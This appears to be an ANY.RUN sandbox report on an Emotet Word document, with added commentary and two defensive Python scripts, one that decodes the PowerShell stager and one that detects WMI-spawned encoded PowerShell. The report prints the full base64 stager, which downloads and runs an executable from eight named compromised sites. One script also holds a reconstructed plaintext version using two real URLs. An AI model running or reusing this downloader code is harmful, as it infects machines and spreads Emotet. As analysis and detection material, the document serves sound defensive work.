File name: | PO# 10202020.doc |
Full analysis: | https://app.any.run/tasks/685b903f-1740-4cfa-8826-3605673db78d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it was upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | October 20, 2020, 03:05:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Voluptatem., Author: Zoe Lacroix, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 19 23:56:00 2020, Last Saved Time/Date: Mon Oct 19 23:56:00 2020, Number of Pages: 1, Number of Words: 2182, Number of Characters: 12441, Security: 8 |
MD5: | 2EFF7536474058E7618AB5412A6D4AA0 |
SHA1: | 1F209782ECA4BC45D81D941209661EA25AE03C3E |
SHA256: | 95B98FAF2F2B61CBBC67B3A74804114372F608A947809D4DEE22642261B87A52 |
SSDEEP: | 3072:6JivKie6B/w2yiWydwjxBft2LGRo0z5v9Sd+l4PJhERTM5/oKUQ2t17RR39V:6JiP/w2PwxBft2LG60z5v9Sd+l4PJhEn |
Extension | Description | Match
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Title: | Voluptatem. |
---|---|
Subject: | - |
Author: | Zoe Lacroix |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:19 22:56:00 |
ModifyDate: | 2020:10:19 22:56:00 |
Pages: | 1 |
Words: | 2182 |
Characters: | 12441 |
Security: | Locked for annotations |
Company: | - |
Lines: | 103 |
Paragraphs: | 29 |
CharCountWithSpaces: | 14594 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | -
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PO# 10202020.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3492 | POwersheLL -ENCOD JABEAFAAOQAxACAAIAA9AFsAdAB5AHAARQBdACgAJwBzAHkAcwBUAGUAbQAuAEkAJwArACcAbwAuAEQASQByAGUAJwArACcAYwB0ACcAKwAnAG8AJwArACcAcgBZACcAKQA7ACAAIABzAEUAdAAtAGkAVABlAE0AIAAgAFYAYQBSAEkAQQBiAGwARQA6AEcANwAwACAAKAAgAFsAdABZAHAARQBdACgAJwBTAFkAcwAnACsAJwB0AGUATQAuAE4AJwArACcAZQBUAC4AcwBlAFIAVgBJAEMAJwArACcAZQBQACcAKwAnAG8ASQAnACsAJwBuAFQAbQBhACcAKwAnAG4AQQBHACcAKwAnAGUAJwArACcAUgAnACkAKQA7ACAAIAAgAFMARQBUACAAKAAiAEgAIgArACIAYgBKAGMATAA2ACIAKQAgACAAKAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAUwBUACcAKwAnAGUAbQAuAE4AJwArACcARQAnACsAJwBUAC4AcwBlACcAKwAnAGMAJwArACcAdQBSAGkAVAB5AFAAcgBPAHQAbwAnACsAJwBDAE8AJwArACcATAB0AFkAUABFACcAKQApACAAOwAgACAAJABKADQAaQA0AHEAaQA1AD0AKAAnAE0AJwArACcAZwBkAGMAaABvAHoAJwApADsAJABFADUAMQBzAGQANAB2AD0AJABOADAAcwA0AGkAOABwACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATQBrAGYAaQBmAGsAbQA7ACQASAB2AGUAbAB1ADQAcAA9ACgAJwBVAHMAcAAnACsAJwB2AHUAcQBmACcAKQA7ACAAKAAgAFYAQQByAGkAQQBiAGwAZQAgAGQAcAA5ADEAIAAtAHYAQQBsAHUAIAAgACkAOgA6AEMAUgBFAGEAdABlAEQASQBSAGUAYwB0AE8AcgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB4AHQAOAAnACsAJwBBAHcAdgA4ADMAeAB0AHgAdAA4ACcAKwAnAFUAJwArACcAMwBmADYAaQBvAHQAeAAnACsAJwB0ADgAJwApACAALQBjAHIAZQBwAGwAQQBDAEUAIAAnAHgAdAA4ACcALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADMAbQBqADgAMgA3AD0AKAAnAEoANQBsACcAKwAnAGcAZAB2ADkAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABJAFQARQBNACAAIAB2AGEAcgBpAEEAQgBMAGUAOgBHADcAMAAgACAAKQAuAFYAQQBMAHUARQA6ADoAUwBFAEMAdQByAGkAdABZAFAAcgBPAFQAbwBjAE8AbAAgAD0AIAAgACgAIAB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBoACIAKwAiAEIAagBDAEwANgAiACkAIAAtAFYAQQBMAHUARQBvACAAKQA6ADoAVABsAHMAMQAyADsAJABWAGwANAB3AGoAbgA1AD0AKAAnAE8AJwArACcAMQBhADIAJwArACcAcwA1ADcAJwApADsAJABCAGEAeAA5AGEAbABmACAAPQAgACgAJwBEADIAZQBuADAAJwArACcAZAAnACkAOwAkAE8AMQB5ADkAMgBzAGoAPQAoACcARgAnACsAJwB1AGoAJwArACcAMgBpAHkAdAAnACkAOwAkAFQAMAB4AHoAaAAxAGYAPQAoACcATwA5AGoAYQBtACcAKwAnAHIAdQAnACkAOwAkAEUAZAA1AHMAcAA1ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAQQB3AHYAOAAzACcAKwAnAHgAdAAnACsAJwB7ADAAfQAnACs
AJwBVADMAZgA2ACcAKwAnAGkAbwB0ACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBmAFsAQwBIAGEAUgBdADkAMgApACsAJABCAGEAeAA5AGEAbABmACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABUAHAAagA4AHcAcQBkAD0AKAAnAEgAYQA0ACcAKwAnAGcAaQBkAHgAJwApADsAJABHAHkAdQBtADkAYwA4AD0ATgBlAGAAdwBgAC0ATwBiAGAAagBlAEMAVAAgAG4ARQB0AC4AVwBFAEIAQwBsAGkARQBuAHQAOwAkAFkAZwAwAGwANABkAGYAPQAoACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGEAJwArACcAcgBpAGYAJwArACcAdQBsAGgAdQBxACcAKwAnAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAALQAnACsAJwBpAG4AJwArACcAYwBsAHUAZABlAHMALwB1AGMAVgAnACsAJwA4ACcAKwAnAC8AKgAnACsAJwBoAHQAdABwAHMAOgAvAC8AdABoACcAKwAnAGUAJwArACcAdQAnACsAJwBzAG0AYQBuAHMAYQAnACsAJwBpAGYALgBjAG8AbQAvACcAKwAnAHcAJwArACcAcAAvACcAKwAnAGUAVgBpAG4AJwArACcAYwAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzACcAKwAnADoALwAvAGcAcgBlAGUAJwArACcAbgBsAGEAbgBkACcAKwAnAGwAJwArACcAaQAnACsAJwBvAG4AJwArACcALgAnACsAJwBjAG8AbQAvAHcAcAAtAGMAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQALwAnACsAJwBDAC8AKgBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvACcAKwAnAC8AdwAnACsAJwBlAGIAYwBsAGkAZQAnACsAJwBuAHQAJwArACcAdwAnACsAJwBvACcAKwAnAHIAawBzACcAKwAnAC4AJwArACcAeAB5AHoALwBmAGwAJwArACcAbwAnACsAJwByAGkAZAAnACsAJwBhAC8AdQA3AGEASgAvACcAKwAnACoAJwArACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGgAZAAuAHkAYQBtAGEAJwArACcAcgBpAG4AawBvAHUAJwArACcALgBqAHAALwBiAGwAbwBnAHMALwAnACsAJwA5ACcAKwAnADcAdwBTAHcARgBiAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGwAZQBnACcAKwAnAGEAbAAnACsAJwBlAG0AJwArACcAcABvAHcAZQByACcAKwAnAG0AZQBuAHQAJwArACcAaQBuACcAKwAnAGQAaQAnACsAJwBhACcAKwAnAC4AYwBvAG0ALwAnACsAJwBjAGcAJwArACcAaQAnACsAJwAtAGIAaQAnACsAJwBuAC8AJwArACcAOQBaADYATAAnACsAJwAvACoAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6AC8ALwAnACsAJwBkAGgAYQAnACsAJwByAGEAbQAnACsAJwBwAGEAbAAuAG4AZQB0ACcAKwAnAC8AcABhACcAKwAnAHIAZQAnACsAJwBuAHQALwBMACcAKwAnAE4AbgBiAEIALwAqACcAKwAnAGgAdAB0AHAAcwA6AC8AJwArACcALwB6AGkAaQBsAC4AZQB1ACcAKwAnAC8AYwBnAGkALQBiACcAKwAnAGkAJwArACcAbgAvACcAKwAnAEoATgB6AEkAJwArACcALwAnACkALgBTAFAAbABpAHQAKAAkAFAAdwBvAHAAbABvAHkAIAArACAAJABFADUAMQBzAGQANAB2ACAAKwAgACQATwAxAG8ANABpAGkAbQApADsAJABaAGIAMAA0AG8
AdwB0AD0AKAAnAFcAcABvAGgAJwArACcAOQAnACsAJwAwADIAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLAHcAMwBrADcAOAA3ACAAaQBuACAAJABZAGcAMABsADQAZABmACkAewB0AHIAeQB7ACQARwB5AHUAbQA5AGMAOAAuAGQATwBXAG4ATABvAEEARABGAEkAbABlACgAJABLAHcAMwBrADcAOAA3ACwAIAAkAEUAZAA1AHMAcAA1ADUAKQA7ACQASAA3AHAAMQBjAGYAOAA9ACgAJwBUAHEAbgA3AGMAJwArACcAawBhACcAKQA7AEkAZgAgACgAKABHAEUAVAAtAGAASQBUAGAAZQBNACAAJABFAGQANQBzAHAANQA1ACkALgBsAGUAbgBHAFQAaAAgAC0AZwBlACAAMgA0ADgAMQAyACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACcAMwAnACsAJwAyAF8AUAByACcAKwAnAG8AYwBlAHMAcwAnACkAKQAuAEMAcgBlAGEAVABFACgAJABFAGQANQBzAHAANQA1ACkAOwAkAEIAaABoAGUANQBfAF8APQAoACcAQwB2ADgAXwByADgAJwArACcAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFkAcwBtADUAdwB5ADYAPQAoACcAUABiACcAKwAnADAAagB4AGkAdgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAdAA2ADMAdQBsAHEAPQAoACcASwB4ACcAKwAnAF8AJwArACcAdgBfAG8AawAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe |  | wmiprvse.exe
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3088 | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe |  | wmiprvse.exe
User: admin; Integrity Level: MEDIUM; Exit code: 0
3120 | "C:\Users\admin\AppData\Local\WFS\wpcao.exe" | C:\Users\admin\AppData\Local\WFS\wpcao.exe |  | D2en0d.exe
User: admin; Integrity Level: MEDIUM
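The 3492 row is the whole stager: `-ENCOD` is accepted because powershell.exe matches any unambiguous prefix of `-EncodedCommand`, and the argument is base64 of the UTF-16LE script (the `JAB` prefix is `$` in that encoding). Decoded, it builds a `*`-separated list of eight URLs (the eight domains in the DNS table), downloads each in turn with `Net.WebClient.DownloadFile` to `%USERPROFILE%\Awv83xt\U3f6iot\D2en0d.exe`, and as soon as the file is at least 24812 bytes runs it through `[wmiclass]win32_Process.Create`, which is why D2en0d.exe's parent is wmiprvse.exe rather than PowerShell and why the file table can show the drop path typed as html at one point (the 380-byte 403 page from dharampal.net, for example, is written there and rejected by the size check before the next URL is tried). The following is an added example, not ANY.RUN's code or anything from the report: a Python triage helper that decodes such a blob and undoes its obfuscation layers (string concatenation, `[char]` arithmetic, `-f`/`-creplace` with `[CHaR]92` as the path separator, backtick-split cmdlet names). It runs on a constructed sample modelled on the page's command with two of its eight URLs; the sample itself and the names `analyse`/`normalise` are mine.

```python
import base64
import re

# Constructed sample in the style of the page's "-ENCOD" stager: same tricks
# (string concatenation, [char] arithmetic, -f with [CHaR]92 as the path separator,
# backtick-split cmdlet names, WMI launch), two of its eight URLs. It is NOT the
# page's blob; pass that blob to analyse() to process the real one.
SAMPLE_PLAINTEXT = (
    "$Dir=[typE]('sysTem.I'+'o.DIre'+'ct'+'o'+'rY');"
    "$Drop=$env:userprofile+(('{0}'+'Awv83'+'xt'+'{0}'+'U3f6'+'iot'+'{'+'0}') -f[CHaR]92)"
    "+('D2en0'+'d')+('.e'+'xe');"
    "$Wc=Ne`w`-Ob`jeCT nEt.WEBCliEnt;"
    "$Urls=('htt'+'p'+'s:/'+'/a'+'rif'+'ulhuq'+'.co'+'m/'+'wp-'+'in'+'cludes/ucV'+'8'+'/*'"
    "+'http:/'+'/leg'+'al'+'em'+'power'+'ment'+'in'+'di'+'a'+'.com/'+'cg'+'i'+'-bi'+'n/'+'9Z6L'+'/')"
    ".SPlit([char](80 - 38));"
    "foreach ($u in $Urls){try{$Wc.dOWnLoADFIle($u, $Drop);"
    "If ((GET-`IT`eM $Drop).lenGTh -ge 24812) "
    "{([wmiclass]('wi'+'n'+'3'+'2_Pr'+'ocess')).CreaTE($Drop);break}}catch{}}"
)
# -EncodedCommand (any prefix such as -e, -enc or -ENCOD is accepted) takes base64
# of the UTF-16LE script; the "JAB" prefix seen on the page is "$" in that encoding.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


def _until_stable(pattern, repl, text):
    while True:
        new = re.sub(pattern, repl, text)
        if new == text:
            return text
        text = new


def normalise(script: str) -> str:
    """Undo the cheap obfuscation layers so the strings become readable."""
    s = script.replace("`", "")  # Ne`w-Ob`jeCT -> New-ObjeCT (safe outside "..." escapes)
    # [char](80 - 38) and [CHaR]92 -> quoted literal character
    s = re.sub(r"\[char\]\s*\(\s*(\d+)\s*([-+])\s*(\d+)\s*\)",
               lambda m: "'%c'" % (int(m.group(1)) + int(m.group(3)) * (1 if m.group(2) == "+" else -1)),
               s, flags=re.I)
    s = re.sub(r"\[char\]\s*(\d+)", lambda m: "'%c'" % int(m.group(1)), s, flags=re.I)
    # 'a'+'b' -> 'ab' (also "a"+"b"), repeated until no concatenation is left
    for q in ("'", '"'):
        s = _until_stable(rf"{q}([^{q}]*){q}\s*\+\s*{q}([^{q}]*){q}",
                          lambda m, q=q: q + m.group(1) + m.group(2) + q, s)
    # ('{0}a{0}b') -f '\' -> '\a\b'   and   ('xt8a') -creplace 'xt8','\' -> '\a'
    s = re.sub(r"\(\s*'([^']*)'\s*\)\s*-f\s*'([^']*)'",
               lambda m: "'" + m.group(1).replace("{0}", m.group(2)) + "'", s, flags=re.I)
    s = re.sub(r"\(\s*'([^']*)'\s*\)\s*-c?replace\s*'([^']*)'\s*,\s*'([^']*)'",
               lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", s, flags=re.I)
    # drop parentheses around a lone literal, but not in calls or casts: f('x'), [t]('x')
    s = re.sub(r"(?<![\w\]\)])\(\s*('[^']*')\s*\)", lambda m: m.group(1), s)
    return _until_stable(r"'([^']*)'\s*\+\s*'([^']*)'",
                         lambda m: "'" + m.group(1) + m.group(2) + "'", s)


def analyse(blob: str) -> dict:
    s = normalise(decode_encoded_command(blob))
    urls = []
    m = re.search(r"'([^']*)'\s*\.split\(([^)]*)\)", s, re.I)
    if m:
        lit = re.fullmatch(r"\s*'(.+?)'\s*", m.group(2))
        # The page's blob builds the separator from variables whose other terms are
        # undefined, leaving [char](80 - 38) == '*'; assume '*' when it is not a literal.
        sep = lit.group(1) if lit else "*"
        urls = [u for u in m.group(1).split(sep) if u]
    drop = re.search(r"\$env:userprofile\s*\+\s*'([^']*)'", s, re.I)
    size = re.search(r"\.length\s+-ge\s+(\d+)", s, re.I)
    wmi = re.search(r"\[wmiclass\]\s*\(\s*'win32_process'\s*\)\s*\)?\s*\.create\b", s, re.I)
    return {
        "script": s,
        "urls": urls,
        "drop_path": ("%USERPROFILE%" + drop.group(1)) if drop else None,
        "min_size": int(size.group(1)) if size else None,
        "wmi_launch": wmi is not None,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_ENCODED), indent=2))
```

To run it against the report, join the three wrapped lines of the 3492 command line into one string with no separator and pass it to `analyse`. The regexes are deliberately narrow to the patterns in this stager family; anything they do not recognise is left in `script` untouched rather than guessed.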
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5AE6.tmp.cvr | — | — | —
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR8YI57SOSFGW7YCDJ3A.temp | — | — | —
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | B8D28A0751A092388652CF6B1F64DABE | BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | F00CFA0FC62A12DA8A033BE3ABA2EF8E | 1619D99CBBB6C376255F2C67BAC847B352A25C6964FDEEFA70C58CBB1E9790B3
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 5E0B022F755530A9F50828D736CC9FE7 | 1F67F157E187EAAD5BD5B8C80E4B5290B92D14D4A12DD6E98A4436E7E7CE958A
3492 | POwersheLL.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | html | E0EBA4960A5C222BF2D022F1A1F54E5E | 8AC20CBAEB52173B92338D79D4533B1362D26DE0F5DFF0B977F47DAD4BAAC919
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1666ae.TMP | binary | B8D28A0751A092388652CF6B1F64DABE | BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$# 10202020.doc | pgc | 948AD51A2ED54E11AC069BB8EEE770D5 | 7294A3A9E80E07EA46D8F11D21C68256FC651EB47B3B2D5372B243032C8E4C6A
3088 | D2en0d.exe | C:\Users\admin\AppData\Local\WFS\wpcao.exe | executable | C9C10AE87ED8B75D020D4B7767A73BD1 | 5AFC0966AE64144BE5AB45148C6F0C737B60A337DCE75D1590196F96E9B39DE9
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3492 | POwersheLL.exe | GET | — | 202.66.172.245:80 | http://legalempowermentindia.com/cgi-bin/9Z6L/ | IN | — | — | suspicious |
3120 | wpcao.exe | POST | 200 | 24.230.141.169:80 | http://24.230.141.169/FsGpGwodDOGyip2/ERrT4qltQVGRrJ7/ | US | binary | 132 b | malicious |
3492 | POwersheLL.exe | GET | 403 | 69.12.87.2:80 | http://dharampal.net/parent/LNnbB/ | US | html | 380 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
3492 | POwersheLL.exe | 198.37.123.126:443 | theusmansaif.com | DC74 LLC | US | malicious |
3492 | POwersheLL.exe | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
3492 | POwersheLL.exe | 202.66.172.245:80 | legalempowermentindia.com | ZNet Cloud Services | IN | suspicious |
3492 | POwersheLL.exe | 148.72.118.97:443 | webclientworks.xyz | — | US | unknown |
3492 | POwersheLL.exe | 104.31.76.228:443 | greenlandlion.com | Cloudflare Inc | US | shared |
3492 | POwersheLL.exe | 163.43.94.66:443 | hd.yamarinkou.jp | SAKURA Internet Inc. | JP | unknown |
3492 | POwersheLL.exe | 69.12.87.2:80 | dharampal.net | QuadraNet, Inc | US | unknown |
3492 | POwersheLL.exe | 185.7.252.116:443 | ziil.eu | Elkdata OU | EE | unknown |
3120 | wpcao.exe | 24.230.141.169:80 | — | Midcontinent Communications | US | malicious |
Domain | IP | Reputation
---|---|---
arifulhuq.com | — | suspicious
theusmansaif.com | — | malicious
greenlandlion.com | — | unknown
webclientworks.xyz | — | unknown
hd.yamarinkou.jp | — | unknown
legalempowermentindia.com | — | suspicious
dharampal.net | — | unknown
ziil.eu | — | unknown
PID | Process | Class | Message |
---|---|---|---|
3120 | wpcao.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
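The process table carries the detection lesson of this report: neither POwersheLL.exe nor D2en0d.exe has WINWORD.EXE as parent, because both were started through WMI and so appear under wmiprvse.exe, and the PowerShell flag is `-ENCOD` rather than `-EncodedCommand`. A rule keyed on "Word spawns PowerShell" or on the literal flag name sees nothing here. The block below is an added example, not part of the ANY.RUN report: detection logic over constructed process-creation events whose PIDs, images, parents and command lines follow the page's process table (the svchost/WmiPrvSE/explorer PIDs, the timestamps, the benign PowerShell row 4100 and the profile allow-list are my assumptions). It flags encoded PowerShell and user-profile executables started by WmiPrvSE, walks the ancestry to show where the chain stops, and recovers the Office origin by time and user correlation instead of parentage.

```python
import re
from datetime import datetime, timedelta

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# powershell.exe takes any prefix of -EncodedCommand (-e, -enc, -ENCOD, ...) and -ec,
# which is why matching the literal flag name misses the page's command line.
_ENC = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}
ENC_RE = re.compile(r"(?:^|\s)[-/](?:" + "|".join(sorted(_ENC, key=len, reverse=True))
                    + r")(?=\s|$)", re.I)
# Assumed allow-list: profile locations from which executables legitimately run.
PROFILE_OK = ("\\appdata\\local\\microsoft\\", "\\appdata\\local\\programs\\")


def ev(pid, ppid, time, user, image, cmdline, parent_image):
    return dict(pid=pid, ppid=ppid, time=datetime.fromisoformat(time), user=user,
                image=image, cmdline=cmdline, parent_image=parent_image)


# Constructed process-creation events (Sysmon event 1 shape) following the page's
# process table; PIDs 600/880/1400/1752, times and row 4100 are assumptions.
EVENTS = [
    ev(880, 600, "2020-10-20T03:00:05", "SYSTEM", r"C:\Windows\System32\svchost.exe",
       "svchost.exe -k netsvcs", r"C:\Windows\System32\services.exe"),
    ev(2832, 1400, "2020-10-20T03:05:40", "admin",
       r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
       r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PO# 10202020.doc"',
       r"C:\Windows\explorer.exe"),
    ev(1752, 880, "2020-10-20T03:05:50", "NETWORK SERVICE",
       r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe -secured -Embedding",
       r"C:\Windows\System32\svchost.exe"),
    ev(3492, 1752, "2020-10-20T03:05:52", "admin",
       r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
       "POwersheLL -ENCOD JABEAFAAOQAxACAAIAA9AFsAdAB5AHAARQBd...",  # page blob, truncated
       r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ev(3088, 1752, "2020-10-20T03:06:05", "admin", r"C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe",
       r"C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ev(3120, 3088, "2020-10-20T03:06:08", "admin", r"C:\Users\admin\AppData\Local\WFS\wpcao.exe",
       r'"C:\Users\admin\AppData\Local\WFS\wpcao.exe"', r"C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe"),
    ev(4100, 1400, "2020-10-20T03:07:00", "admin",  # benign admin script, must not fire
       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
       r"C:\Windows\explorer.exe"),
]


def bn(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def from_profile_dropzone(image):
    p = image.lower()
    return p.startswith("c:\\users\\") and not any(ok in p for ok in PROFILE_OK)


def triage(events):
    """Return (pid, reason) findings for the chain shown in the page's process table."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid[e["ppid"]]["image"] if e["ppid"] in by_pid else e["parent_image"]
        img, par = bn(e["image"]), bn(parent)
        if img in POWERSHELL and ENC_RE.search(e["cmdline"]):
            if par == "wmiprvse.exe":
                findings.append((e["pid"], "encoded PowerShell started by WmiPrvSE (Win32_Process.Create)"))
            elif par in OFFICE:
                findings.append((e["pid"], "encoded PowerShell started directly by an Office process"))
        if from_profile_dropzone(e["image"]):
            if par == "wmiprvse.exe":
                findings.append((e["pid"], "executable under the user profile started by WmiPrvSE"))
            elif from_profile_dropzone(parent):
                findings.append((e["pid"], "executable under the user profile started by another one"))
    return findings


def ancestry(events, pid):
    """Image names from pid upwards; with WMI in the chain this never reaches Word."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(bn(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def office_context(events, pid, window=timedelta(seconds=120)):
    """PIDs of Office processes of the same user started within `window` before pid."""
    e = {x["pid"]: x for x in events}[pid]
    return [o["pid"] for o in events
            if bn(o["image"]) in OFFICE and o["user"] == e["user"]
            and timedelta(0) <= e["time"] - o["time"] <= window]


if __name__ == "__main__":
    for pid, why in triage(EVENTS):
        print(pid, why, "| ancestry:", " <- ".join(ancestry(EVENTS, pid)),
              "| office within 120 s:", office_context(EVENTS, pid))
```

The time-window correlation is a heuristic, not proof: it only says which Office process of that user was alive shortly before the WMI-spawned child, which is enough to pull the document (and its hashes from the top of this report) into the investigation.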